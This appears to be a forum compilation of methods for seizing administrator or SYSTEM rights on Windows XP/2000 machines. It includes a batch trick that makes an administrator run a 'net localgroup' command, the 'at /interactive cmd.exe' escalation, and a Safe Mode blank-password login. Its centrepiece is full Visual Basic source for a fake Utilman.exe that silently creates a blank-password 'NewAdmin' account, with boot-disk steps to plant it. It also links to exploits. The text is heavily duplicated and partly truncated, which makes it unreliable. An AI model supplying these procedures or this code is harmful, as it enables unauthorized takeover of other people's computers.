Method 1:-
- Open Notepad -> type "net localgroup Administrator yourusername/add" (without the quotes)
- Make the admin login to the computer -> make him to run the file -> Congrats you are admin
Method No. 2
- Login to your XP box as a non-priviliged user.
- Open up a command window (run cmd.exe)
- In that command window, have the system schedule launch another command window.
- type at 20:00 /intereactive "cmd.exe" -> in the command prompt -> it will launch a interactive cmd with system priviliages at 20:00 -> set the time just ahead of your clock
- When new window opens, kill explorer.exe in task manager.
- open explorer.exe
- Congrats, you're now running as the system user - you have more power than 'Administrator'!
- Now you can make yourself administrator by adding your name to Administrators group
- Type this in command prompt -> net localgroup Administrator /add
Method 3:-
Method 4:-
Other methods
Exploits :- like
http://www.milw0rm.com/exploits/556 - jpeg of death
http://insecure.org/sploits/NT.get-admin.kernal.hole.html
http://www.milw0rm.com/exploits/475 - jpeg exploit
Registry Changes :-
1. Run Registry Editor (Regedt32.exe).
2. Perform the following steps on each of the registry keys
identified above:
A. On the Security menu, click Permissions.
B. Click "Replace Permissions on Existing Subkeys" so that it
is
selected.
C. Click Everyone, change the Type Of Access to Read, and then
click OK.
3. Exit Registry Editor.
from :- http://insecure.org/sploits/NT.startup_programs.bad_registry_perms.html
Resetting the admin password :-
With Boot Disk
With Windows XP Boot CD
1. Place in windows XP CD and start your computer (it?s assumed here that your XP CD is bootable ? as it should be - and that you have your bios set to boot from CD)
2. Keep your eye on the screen messages for booting to your cd usually it will be ?Press any key to boot from cd?
3. Begin windows Repair process.
4. During the reboot, do not make the mistake of ?pressing any key? to boot from the CD again!
5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
From here you can run any windows command and you?ll have full administrator access. To reset password you can use ether of two ways:
1) Run NUSRMGR.CPL to get graphical interface
2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->Users
another method :-
Run Apps with admin privilages
try runnigh your code with Administrator privilages with command "runas"
eg :- runas /env /user:Administrator "c:WINDOWSNOTEPAD.EXE"
it will run notepad in Administrator privilages , similarly run your code in admin privilages
Haven't tested it myself taken from :- http://hype-free.blogspot.com/2006/09/non-hacking-tutorial-on-elevating.html
One more Method:-
OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!
Gain SYSTEM/Administrative Access to Windows XP/2000
I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this
to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.
(Im stoned and its 3:15a.m. so i hope this makes sense)
Overview:
Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is
located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make
your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.
If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this
will take a few minutes depending on how fast the PC is.
First We need to make the program
I used Visual Basic 6, here is my source code that i used to create the administrative account:
#################################START###############################
Private Sub Form_Load()
Shell "net user NewAdmin " & """""" & " /add", vbHide
Pause (1)
Shell "net localgroup administrators NewAdmin /add", vbHide
Pause (1)
msgbox "Added Administrative User",16,"Hacked XP"
End
End Sub
Sub Pause(interval)
'Pauses execution
Current = Timer
Do While Timer - Current < Val(interval)
DoEvents
Loop
End Sub
'#################################END###############################
Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank
password and then adds them to the Administrators Group.
Ok Now that we've made the program lets move on...
FAT32
1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe
2. Add the newly made Utilman.exe to the Floppy
3. Restart the computer with the floppy in it
4. After DOS loads type C: and press enter.
5. If it changes from A:/> to C:/> then your doing good
6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file
7. Restart the computer without the floppy in it
8. When it gets to the Login Screen Press the Windows Key + U
9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10
9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your
PC.
10. After pressing Windows Key + U then type in the username NewAdmin and push Enter. Thats It you now have administrative access to
your PC.
NTFS
Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)
LOL i hope that made sense
- Open Notepad -> type "net localgroup Administrator yourusername/add" (without the quotes)
- Make the admin login to the computer -> make him to run the file -> Congrats you are admin
Method No. 2
- Login to your XP box as a non-priviliged user.
- Open up a command window (run cmd.exe)
- In that command window, have the system schedule launch another command window.
- type at 20:00 /intereactive "cmd.exe" -> in the command prompt -> it will launch a interactive cmd with system priviliages at 20:00 -> set the time just ahead of your clock
- When new window opens, kill explorer.exe in task manager.
- open explorer.exe
- Congrats, you're now running as the system user - you have more power than 'Administrator'!
- Now you can make yourself administrator by adding your name to Administrators group
- Type this in command prompt -> net localgroup Administrator /add
Method 3:-
- Boot in the Safe mode in XP
- Most of the times people have no password for the real Administrator account , they usually give admin privilages to another account
- Get in the administrator account
- Most of the times people have no password for the real Administrator account , they usually give admin privilages to another account
- Get in the administrator account
Method 4:-
- Boot from live CD of a linux/unix distro
-
-
Other methods
Exploits :- like
http://www.milw0rm.com/exploits/556 - jpeg of death
http://insecure.org/sploits/NT.get-admin.kernal.hole.html
http://www.milw0rm.com/exploits/475 - jpeg exploit
Registry Changes :-
1. Run Registry Editor (Regedt32.exe).
2. Perform the following steps on each of the registry keys
identified above:
A. On the Security menu, click Permissions.
B. Click "Replace Permissions on Existing Subkeys" so that it
is
selected.
C. Click Everyone, change the Type Of Access to Read, and then
click OK.
3. Exit Registry Editor.
from :- http://insecure.org/sploits/NT.startup_programs.bad_registry_perms.html
Resetting the admin password :-
With Boot Disk
With Windows XP Boot CD
1. Place in windows XP CD and start your computer (it?s assumed here that your XP CD is bootable ? as it should be - and that you have your bios set to boot from CD)
2. Keep your eye on the screen messages for booting to your cd usually it will be ?Press any key to boot from cd?
3. Begin windows Repair process.
4. During the reboot, do not make the mistake of ?pressing any key? to boot from the CD again!
5. Keep your eye on the lower left hand side of the screen and when you see the Installing Devices progress bar, press SHIFT + F10. This is the security hole! A command console will now open up giving you the potential for wide access to your system.
From here you can run any windows command and you?ll have full administrator access. To reset password you can use ether of two ways:
1) Run NUSRMGR.CPL to get graphical interface
2) Run Compmgmt.msc to get Computer Management console. From there use Local User and Groups->Users
another method :-
Run Apps with admin privilages
try runnigh your code with Administrator privilages with command "runas"
eg :- runas /env /user:Administrator "c:WINDOWSNOTEPAD.EXE"
it will run notepad in Administrator privilages , similarly run your code in admin privilages
1 .use sudowin. This is an open source project distributed under the BSD License (which is a very permissive license ? an example about how permissive it is is the fact that for a long time parts of the Windows network stack were taken from an externally developed source code licensed under this license) written in .NET 2.0. What it does is that it gives administrative credentials to the programs you want to, but they will still run with your profile (meaning that they will see the same registry, the same desktop / my documents directory and so on). An other important differnce is that you must enter your password to elevate privileges. It also contains both a GUI and a command line component. To install it, take the following steps:
go to the website and download it (in a rather confusing move the download link is where it displays the version number, towards the upper middle of the page, currently it says 0.1.1-r95). If you didn't download anything from sourceforge.net until now, it will ask you to select a mirror.
2 .You'll need the .NET framework 2.0. You can download it from the microsoft site if you don't already have it (be sure to download the redistributable package not the software development kit). Here is a direct link if you are running a 32 bit Intel or AMD machine. If you already have the .NET framework 1.0 or 1.1, it will prompt you during the installation and offer you the possibility to download and install the 2.0 version without interrupting the installation.
3 . Install the software. Remember to do this from an account with administrative privileges (you can use the methods described earlier to run the installation with enough privileges).
4. Using a notepad with administrative privileges edit the sudoers.xml file located in the Server subdirectory of the install directory (this is C
rogram Filessudowin by default or Crogram Files (x86)sudowin on 64 bit systems). Go to the users section and add the users you want to have sudo capabilities (remember to enter the names in the format of . If you are a home user, you can find out your complete name by entering whoami at the command prompt). Now go towards the end and enter the commands which you want to be able to run with elevated privileges. Also look around the file and change other settings to fir your need. Save the file.
5. Use the command runas /user:Administrator "cmd /c start lusrmgr.msc" (assuming that Administrator is a user with administrative privileges to which you know the password) to display the user management console (anyone else finds the name funny?). Go to each user you want to be able to perform sudo and add them to the Sudoers group which was created by sudowin during the installation (you can do this by right clicking on them, clicking properties, going to the "Member of" tab, clicking Add, writing Sudoers and clicking Ok).
6. Use the command runas /user:Administrator "cmd /c start services.msc", find the sudowin service and restart it.
go to the website and download it (in a rather confusing move the download link is where it displays the version number, towards the upper middle of the page, currently it says 0.1.1-r95). If you didn't download anything from sourceforge.net until now, it will ask you to select a mirror.
2 .You'll need the .NET framework 2.0. You can download it from the microsoft site if you don't already have it (be sure to download the redistributable package not the software development kit). Here is a direct link if you are running a 32 bit Intel or AMD machine. If you already have the .NET framework 1.0 or 1.1, it will prompt you during the installation and offer you the possibility to download and install the 2.0 version without interrupting the installation.
3 . Install the software. Remember to do this from an account with administrative privileges (you can use the methods described earlier to run the installation with enough privileges).
4. Using a notepad with administrative privileges edit the sudoers.xml file located in the Server subdirectory of the install directory (this is C
rogram Filessudowin by default or Crogram Files (x86)sudowin on 64 bit systems). Go to the users section and add the users you want to have sudo capabilities (remember to enter the names in the format of 5. Use the command runas /user:Administrator "cmd /c start lusrmgr.msc" (assuming that Administrator is a user with administrative privileges to which you know the password) to display the user management console (anyone else finds the name funny?). Go to each user you want to be able to perform sudo and add them to the Sudoers group which was created by sudowin during the installation (you can do this by right clicking on them, clicking properties, going to the "Member of" tab, clicking Add, writing Sudoers and clicking Ok).
6. Use the command runas /user:Administrator "cmd /c start services.msc", find the sudowin service and restart it.
Haven't tested it myself taken from :- http://hype-free.blogspot.com/2006/09/non-hacking-tutorial-on-elevating.html
One more Method:-
OK Here it is, Please post some input on what you think. Also im trying to figure out a better way to gain Access to the NTFS partition. Any input welcomed!
Gain SYSTEM/Administrative Access to Windows XP/2000
I will explain how to gain Local Administrative rights to Windows XP/2000 computer without removing or cracking a Users password. In order for this
to work the Computer must have a CD-ROM drive, or other bootable device other then a harddrive.
(Im stoned and its 3:15a.m. so i hope this makes sense)
Overview:
Windows XP/2000 allows you to run a program with System level privileges before logging on. The name of the program is Utility Manager. It is
located at C:Windowssystem32utilman.exe for windows XP and C:WINNTSystem32utilman.exe for windows 2000. So all you have to do is make
your own program that creates an administrative account. The program that you create has to have a filename of Utilman.exe in order to work.
If the filesystem on the computer is FAT32 then this process is very simple and only takes a second. If the Computer uses the NTFS filesystem this
will take a few minutes depending on how fast the PC is.
First We need to make the program
I used Visual Basic 6, here is my source code that i used to create the administrative account:
#################################START###############################
Private Sub Form_Load()
Shell "net user NewAdmin " & """""" & " /add", vbHide
Pause (1)
Shell "net localgroup administrators NewAdmin /add", vbHide
Pause (1)
msgbox "Added Administrative User",16,"Hacked XP"
End
End Sub
Sub Pause(interval)
'Pauses execution
Current = Timer
Do While Timer - Current < Val(interval)
DoEvents
Loop
End Sub
'#################################END###############################
Compile this with the filename of Utilman.exe this is very important! What this program does is create a User named NewAdmin with a blank
password and then adds them to the Administrators Group.
Ok Now that we've made the program lets move on...
FAT32
1. Create a bootable floppy :: http://1gighost.net/keywest/boot98sc.exe
2. Add the newly made Utilman.exe to the Floppy
3. Restart the computer with the floppy in it
4. After DOS loads type C: and press enter.
5. If it changes from A:/> to C:/> then your doing good
6. use this command: Copy A:utilman.exe C:windowssystem32utilman.exe press Y to overwrite the exsisting file
7. Restart the computer without the floppy in it
8. When it gets to the Login Screen Press the Windows Key + U
9. Restart the computer if FastUser Switching is enabled (The Graphical Login with the picture next to the login name, XP Only) if not enabled skip to Step 10
9a. After restarting you should see a new user in the list named NewAdmin, click on this account and you just gained Administrative access to your
PC.
10. After pressing Windows Key + U then type in the username NewAdmin and push Enter. Thats It you now have administrative access to
your PC.
NTFS
Use a Windows 2000 Setup CD to gain access to the NTFS partition through the recovery console. From the recovery console you can copy over the hacked Utilman.exe. Once in the recovery console follow the same instructions as above from step 6. After copying over the file restart your computer by typing exit or pusing ALT CTRL DEL. Remove the Windows 2000 CD. When windows loads to the choose user screen simply push Windows Key + U. After pushing the Windows Key + U you should see a message that says "Added Administrative User", restart the computer one last time then choose the NewAdmin user account. This will have Administrative Privileges. It works ive done it and i hope you all enjoy this nice little hack ! ! ! (If your trying to gain SYSTEM level access your can replace the UTILMAN.exe to open a Command Prompt)
LOL i hope that made sense
